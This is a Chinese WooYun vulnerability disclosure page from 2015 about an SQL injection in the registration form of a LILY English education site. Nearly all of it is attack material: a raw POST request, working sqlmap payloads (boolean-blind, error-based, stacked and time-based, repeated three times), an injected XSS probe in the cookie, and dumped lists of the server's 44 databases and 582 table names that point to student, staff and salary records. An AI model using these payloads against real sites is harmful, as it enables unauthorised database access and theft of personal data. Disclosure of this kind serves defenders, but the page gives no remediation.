当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154204

漏洞标题:LILY英语某站存在SQL注入漏洞

相关厂商:lilyenglish.com

漏洞作者: 路人甲

提交时间:2015-11-19 18:58

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /zc/opSubmit HTTP/1.1
Content-Length: 748
Content-Type: application/x-www-form-urlencoded
Cookie: OSM=7km7j7o67jef3826t9kp6eao21; CNZZDATA3500643=cnzz_eid%3D1321326244-1447658263-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447658263; __utmt=1; __utma=161720296.317590837.1447658264.1447658264.1447658264.1; __utmb=161720296.1.10.1447658264; __utmc=161720296; __utmz=161720296.1447658264.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: eduold.lilyenglish.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&email=sample%40email.tst&password=g00dPa%24%24w0rD&password2=g00dPa%24%24w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111

11.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND 4508=4508#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=-4156" OR 1 GROUP BY CONCAT(0x71716a7871,(SELECT (CASE WHEN (6472=6472) THEN 1 ELSE 0 END)),0x7178716b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111";(SELECT * FROM (SELECT(SLEEP(5)))zYin)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND (SELECT * FROM (SELECT(SLEEP(5)))wKsD)#
---
back-end DBMS: MySQL 5.0.11
available databases [44]:
[*] asck
[*] back
[*] backit_db
[*] beta_homework
[*] blog
[*] cc
[*] ceshi
[*] checkoldinfo
[*] declare
[*] emails
[*] glpi
[*] homework
[*] information_schema
[*] iosapp
[*] it.db
[*] jiaoxuebu
[*] kstudy
[*] lily_bbs
[*] lily_center
[*] lily_discuz
[*] lily_exam
[*] lily_games
[*] lily_registration
[*] lily_sns
[*] lily_ucenter
[*] lilyapi
[*] lilycms
[*] lilycms08
[*] lilyenglish
[*] lilyreader
[*] lilyren
[*] lilyusers
[*] mm
[*] mysql
[*] officework
[*] pe3
[*] performance_schema
[*] test
[*] test_homework
[*] wiki
[*] wordpress
[*] wordpress2
[*] yun
[*] zhangxin

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND 4508=4508#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=-4156" OR 1 GROUP BY CONCAT(0x71716a7871,(SELECT (CASE WHEN (6472=6472) THEN 1 ELSE 0 END)),0x7178716b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111";(SELECT * FROM (SELECT(SLEEP(5)))zYin)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND (SELECT * FROM (SELECT(SLEEP(5)))wKsD)#
---
back-end DBMS: MySQL 5.0.11
current database: 'homework'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND 4508=4508#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=-4156" OR 1 GROUP BY CONCAT(0x71716a7871,(SELECT (CASE WHEN (6472=6472) THEN 1 ELSE 0 END)),0x7178716b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111";(SELECT * FROM (SELECT(SLEEP(5)))zYin)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND (SELECT * FROM (SELECT(SLEEP(5)))wKsD)#
---
back-end DBMS: MySQL 5.0.11
Database: homework
[582 tables]
+---------------------------------------+
| 2014_homework_read_log |
| 2014_mp3_download_log |
| 2014_sid_status |
| 2014_test_temp |
| 借阅日志 |
| 工作任务 |
| 教师编码表 |
| 校内网录音下载日志 |
| 登录日志 |
| 短信队列 |
| 订单表 |
| 试听课打印单流水 |
| 预报名学员 |
| callbacklist_questionnaire |
| camp_age |
| camp_gradelist |
| camplily |
| classify |
| complain |
| course_log |
| create_tuition_log |
| dailyperformance |
| dashboard |
| gonghao |
| goods_nvestigate |
| goodslist |
| jishubu_tele |
| jishubu_weixiu |
| jjjjj |
| lily_2014_downlists |
| lily_2014_downlogs |
| lily_2014_student_performances |
| lily_24_terminaljudge |
| lily_26_basefee |
| lily_26_billboard |
| lily_26_calendars |
| lily_26_charge_refund |
| lily_26_comments |
| lily_26_downlists |
| lily_26_downlogs |
| lily_26_downlogs_web |
| lily_26_edufeed |
| lily_26_exam |
| lily_26_exam_inform |
| lily_26_exam_rule |
| lily_26_examscores |
| lily_26_examscores_old |
| lily_26_examscores_v |
| lily_26_examscores_v0 |
| lily_26_examscores_v1 |
| lily_26_homework |
| lily_26_lastsemesters |
| lily_26_settings |
| lily_26_student_performances |
| lily_26_teacher_performances |
| lily_26_terminaljudge |
| lily_26_wastagerate |
| lily_27_basefee |
| lily_27_billboard |
| lily_27_calendars |
| lily_27_charge_refund |
| lily_27_comments |
| lily_27_downlists |
| lily_27_downlogs |
| lily_27_downlogs_web |
| lily_27_edufeed |
| lily_27_exam |
| lily_27_exam_inform |
| lily_27_exam_rule |
| lily_27_examscores |
| lily_27_holidaywork |
| lily_27_homework |
| lily_27_lastsemesters |
| lily_27_refer_edu |
| lily_27_schedules |
| lily_27_service_investigate |
| lily_27_settings |
| lily_27_student_performances |
| lily_27_teacher_performances |
| lily_27_terminaljudge |
| lily_27_wastagerate |
| lily_27_web |
| lily_28_basefee |
| lily_28_billboard |
| lily_28_calendars |
| lily_28_charge_refund |
| lily_28_comments |
| lily_28_downlists |
| lily_28_downlogs |
| lily_28_downlogs_web |
| lily_28_edufeed |
| lily_28_exam |
| lily_28_exam_inform |
| lily_28_exam_rule |
| lily_28_examscores |
| lily_28_examscores_v |
| lily_28_examscores_v0 |
| lily_28_examscores_v1 |
| lily_28_holidaywork |
| lily_28_homework |
| lily_28_lastsemesters |
| lily_28_refer_edu |
| lily_28_schedules |
| lily_28_service_investigate |
| lily_28_settings |
| lily_28_student_performances |
| lily_28_teacher_performances |
| lily_28_terminaljudge |
| lily_28_wastagerate |
| lily_28_web |
| lily_29_basefee |
| lily_29_billboard |
| lily_29_calendars |
| lily_29_charge_refund |
| lily_29_comments |
| lily_29_downlists |
| lily_29_downlogs |
| lily_29_downlogs_web |
| lily_29_edufeed |
| lily_29_exam |
| lily_29_exam_inform |
| lily_29_exam_rule |
| lily_29_examscores |
| lily_29_examscores_v |
| lily_29_examscores_v0 |
| lily_29_examscores_v1 |
| lily_29_holidaywork |
| lily_29_homework |
| lily_29_lastsemesters |
| lily_29_refer_edu |
| lily_29_schedules |
| lily_29_service_investigate |
| lily_29_settings |
| lily_29_student_performances |
| lily_29_teacher_performances |
| lily_29_terminaljudge |
| lily_29_wastagerate |
| lily_29_web |
| lily_2d_code |
| lily_30_basefee |
| lily_30_billboard |
| lily_30_calendars |
| lily_30_charge_refund |
| lily_30_comments |
| lily_30_downlists |
| lily_30_downlogs |
| lily_30_downlogs_ios |
| lily_30_downlogs_web |
| lily_30_edufeed |
| lily_30_exam |
| lily_30_exam_inform |
| lily_30_exam_rule |
| lily_30_examscores |
| lily_30_examscores_v |
| lily_30_examscores_v0 |
| lily_30_examscores_v1 |
| lily_30_holidaywork |
| lily_30_homework |
| lily_30_lastsemesters |
| lily_30_refer_edu |
| lily_30_schedules |
| lily_30_service_investigate |
| lily_30_settings |
| lily_30_student_performances |
| lily_30_teacher_performances |
| lily_30_terminaljudge |
| lily_30_wastagerate |
| lily_30_web |
| lily_31_basefee |
| lily_31_billboard |
| lily_31_calendars |
| lily_31_charge_refund |
| lily_31_comments |
| lily_31_downlists |
| lily_31_downlogs |
| lily_31_downlogs_ios |
| lily_31_downlogs_web |
| lily_31_edufeed |
| lily_31_exam |
| lily_31_exam_inform |
| lily_31_exam_rule |
| lily_31_examscores |
| lily_31_holidaywork |
| lily_31_homework |
| lily_31_lastsemesters |
| lily_31_refer_edu |
| lily_31_schedules |
| lily_31_service_investigate |
| lily_31_settings |
| lily_31_student_performances |
| lily_31_teacher_performances |
| lily_31_terminaljudge |
| lily_31_wastagerate |
| lily_31_web |
| lily_32_basefee |
| lily_32_billboard |
| lily_32_calendars |
| lily_32_charge_refund |
| lily_32_comments |
| lily_32_downlists |
| lily_32_downlogs |
| lily_32_downlogs_ios |
| lily_32_downlogs_web |
| lily_32_edufeed |
| lily_32_exam |
| lily_32_exam_inform |
| lily_32_exam_rule |
| lily_32_examscores |
| lily_32_examscores_v |
| lily_32_examscores_v0 |
| lily_32_examscores_v1 |
| lily_32_holidaywork |
| lily_32_homework |
| lily_32_lastsemesters |
| lily_32_refer_edu |
| lily_32_schedules |
| lily_32_service_investigate |
| lily_32_settings |
| lily_32_student_performances |
| lily_32_teacher_performances |
| lily_32_terminaljudge |
| lily_32_wastagerate |
| lily_32_web |
| lily_33_basefee |
| lily_33_billboard |
| lily_33_calendars |
| lily_33_charge_refund |
| lily_33_comments |
| lily_33_downlists |
| lily_33_downlogs |
| lily_33_downlogs_ios |
| lily_33_downlogs_web |
| lily_33_edufeed |
| lily_33_exam |
| lily_33_exam_inform |
| lily_33_exam_rule |
| lily_33_examscores |
| lily_33_examscores_v |
| lily_33_examscores_v0 |
| lily_33_examscores_v1 |
| lily_33_holidaywork |
| lily_33_homework |
| lily_33_lastsemesters |
| lily_33_refer_edu |
| lily_33_schedules |
| lily_33_service_investigate |
| lily_33_settings |
| lily_33_student_performances |
| lily_33_teacher_performances |
| lily_33_terminaljudge |
| lily_33_wastagerate |
| lily_33_web |
| lily_34_basefee |
| lily_34_billboard |
| lily_34_calendars |
| lily_34_charge_refund |
| lily_34_comments |
| lily_34_downlists |
| lily_34_downlogs |
| lily_34_downlogs_ios |
| lily_34_downlogs_web |
| lily_34_edufeed |
| lily_34_exam |
| lily_34_exam_inform |
| lily_34_exam_rule |
| lily_34_examscores |
| lily_34_holidaywork |
| lily_34_homework |
| lily_34_lastsemesters |
| lily_34_refer_edu |
| lily_34_schedules |
| lily_34_service_investigate |
| lily_34_settings |
| lily_34_student_performances |
| lily_34_teacher_performances |
| lily_34_terminaljudge |
| lily_34_wastagerate |
| lily_34_web |
| lily_35_basefee |
| lily_35_billboard |
| lily_35_calendars |
| lily_35_charge_refund |
| lily_35_comments |
| lily_35_downlists |
| lily_35_downlogs |
| lily_35_downlogs_ios |
| lily_35_downlogs_web |
| lily_35_edufeed |
| lily_35_exam |
| lily_35_exam_inform |
| lily_35_exam_rule |
| lily_35_examscores |
| lily_35_holidaywork |
| lily_35_homework |
| lily_35_lastsemesters |
| lily_35_refer_edu |
| lily_35_schedules |
| lily_35_service_investigate |
| lily_35_settings |
| lily_35_student_performances |
| lily_35_teacher_performances |
| lily_35_terminaljudge |
| lily_35_wastagerate |
| lily_35_web |
| lily_36_basefee |
| lily_36_billboard |
| lily_36_calendars |
| lily_36_charge_refund |
| lily_36_comments |
| lily_36_downlists |
| lily_36_downlogs |
| lily_36_downlogs_ios |
| lily_36_downlogs_web |
| lily_36_edufeed |
| lily_36_exam |
| lily_36_exam_inform |
| lily_36_exam_rule |
| lily_36_examscores |
| lily_36_holidaywork |
| lily_36_homework |
| lily_36_lastsemesters |
| lily_36_refer_edu |
| lily_36_schedules |
| lily_36_service_investigate |
| lily_36_settings |
| lily_36_student_performances |
| lily_36_teacher_performances |
| lily_36_terminaljudge |
| lily_36_wastagerate |
| lily_36_web |
| lily_acc_accounts |
| lily_acc_logs |
| lily_acc_logs_refund |
| lily_acc_logs_show |
| lily_achievement |
| lily_admin |
| lily_admin_doresource |
| lily_admin_group |
| lily_admin_group_access |
| lily_admin_resource |
| lily_admin_resource_doresource |
| lily_adminsession |
| lily_admissions |
| lily_archive_level |
| lily_archive_managelevel |
| lily_attendtime |
| lily_auth_apply |
| lily_bad_record |
| lily_book_albums |
| lily_book_content |
| lily_book_lists |
| lily_book_logs |
| lily_book_users |
| lily_books |
| lily_bound |
| lily_boxmsg |
| lily_boxmsg_logs |
| lily_business_logs |
| lily_business_logs_refund |
| lily_caijiang2011 |
| lily_camp_qa |
| lily_changeclasses |
| lily_classes |
| lily_classes_attendtime |
| lily_classes_course |
| lily_classes_evaluate |
| lily_classes_group |
| lily_classes_hour |
| lily_classes_material |
| lily_classes_recording |
| lily_classes_relation |
| lily_classes_student |
| lily_classes_summarytest |
| lily_classes_teacher |
| lily_communic_record |
| lily_company |
| lily_complaint |
| lily_consultation |
| lily_cost |
| lily_course |
| lily_course_apply |
| lily_course_classes |
| lily_course_items |
| lily_course_planlog |
| lily_creadit |
| lily_creadit_copy |
| lily_data_logs |
| lily_department |
| lily_diliver_list |
| lily_dl_register |
| lily_document |
| lily_down |
| lily_down_28 |
| lily_downdailyusers |
| lily_downqueues |
| lily_downsession |
| lily_downstat_today |
| lily_downstat_today_old |
| lily_downstats |
| lily_experience |
| lily_feed |
| lily_feed_old |
| lily_formteacher_student |
| lily_goods_order |
| lily_grade |
| lily_graduates |
| lily_hr_class |
| lily_hr_gongzi |
| lily_hr_position |
| lily_inspection |
| lily_invoice |
| lily_kq_holiday |
| lily_kq_items |
| lily_kq_region_teachers |
| lily_kq_regions |
| lily_kq_teacher |
| lily_leave |
| lily_library_addbook_log |
| lily_library_book_albums |
| lily_library_book_content |
| lily_library_book_lists |
| lily_library_book_logs |
| lily_library_book_users |
| lily_library_bookreview |
| lily_library_bookreview_question |
| lily_library_bookreview_studentanswer |
| lily_library_books |
| lily_library_cancel_log |
| lily_library_grade_bookids |
| lily_library_reading_history |
| lily_library_region_stock |
| lily_linux_clients |
| lily_log |
| lily_map_admin |
| lily_map_operationsaccess |
| lily_material |
| lily_material_lost |
| lily_material_record |
| lily_member_changeshift |
| lily_members |
| lily_members_info |
| lily_middle_classes |
| lily_middle_classes_students |
| lily_middle_students |
| lily_monitor_equipment |
| lily_msg_log |
| lily_msg_view |
| lily_new_classes |
| lily_operations_complaint |
| lily_operations_kpi |
| lily_operations_leavels |
| lily_operations_map |
| lily_operations_post |
| lily_operations_praise |
| lily_operations_resign |
| lily_order_logs |
| lily_order_logs_refund |
| lily_other |
| lily_parent_evaluation |
| lily_paylevel_logs |
| lily_positive |
| lily_post |
| lily_postrecord |
| lily_posts |
| lily_praise |
| lily_project |
| lily_province |
| lily_publicclass |
| lily_record_info |
| lily_region_setting |
| lily_regions |
| lily_releases |
| lily_resignation |
| lily_resume |
| lily_return |
| lily_rszp_interview |
| lily_rszp_processlog |
| lily_rszp_professional |
| lily_rszp_school |
| lily_rszp_userinform |
| lily_sanction |
| lily_semester |
| lily_semester_coursetime |
| lily_serial_logs |
| lily_service_project |
| lily_settings |
| lily_settings_region_semester |
| lily_staff |
| lily_staff_configs |
| lily_staff_gongzi |
| lily_staff_gongzi_tmp |
| lily_staff_grade |
| lily_staff_kaoqin |
| lily_staff_settings |
| lily_student_acc_logs |
| lily_student_acc_setup |
| lily_student_archive |
| lily_student_archive_130115 |
| lily_student_archive_tmp |
| lily_student_blacklist |
| lily_student_discount |
| lily_student_investigate |
| lily_student_markinfo |
| lily_student_num |
| lily_student_phonelogs |
| lily_student_region |
| lily_student_reservation |
| lily_student_tarchive |
| lily_student_test |
| lily_student_test_returnvisit |
| lily_student_test_timelogs |
| lily_student_transfer |
| lily_system_logging |
| lily_tapes |
| lily_teacher_accidents |
| lily_teacher_complaint |
| lily_teacher_comps |
| lily_teacher_detailed |
| lily_teacher_event |
| lily_teacher_history |
| lily_teacher_homeworkcollect |
| lily_teacher_lastkq |
| lily_teacher_leavels |
| lily_teacher_leavelsfei |
| lily_teacher_map |
| lily_teacher_month |
| lily_teacher_month_cont |
| lily_teacher_post |
| lily_teacher_praise |
| lily_teacher_quarter |
| lily_teacher_quarter_cont |
| lily_teacher_resign |
| lily_teacher_resignself |
| lily_teacher_rule |
| lily_teacher_scores |
| lily_teacher_stopclasses |
| lily_teachers |
| lily_teaching_log |
| lily_tingke |
| lily_tingke_comment |
| lily_train |
| lily_tuijian |
| lily_turnover |
| lily_turnover_rate |
| lily_tutor |
| lily_tutor_classes |
| lily_tutor_estimate |
| lily_tutor_gongzi |
| lily_tutor_settings |
| lily_user_scorecard |
| lily_userfile |
| lily_users |
| lily_warehouse_list |
| lily_wastagerate |
| lily_wh_register |
| lilyren_article |
| lilyren_comment |
| liubo_questionnaire |
| new_salary_base |
| new_salary_month |
| online |
| pscns |
| reading_score |
| receipt |
| remove_lily_operations_management |
| remove_lily_topfive |
| remove_lily_topfive_votes |
| school |
| sheet1 |
| student_order |
| task_queue |
| taxcontrolmachine |
| tbl_op_sch_check |
| temp_investgate_xiaonei |
| temperatures |
| user_book |
| v_result_teacher_investigate |
| video |
| videolist |
| weixin |
| xtelview |
| xxb_program |
+---------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-12-03:已经解决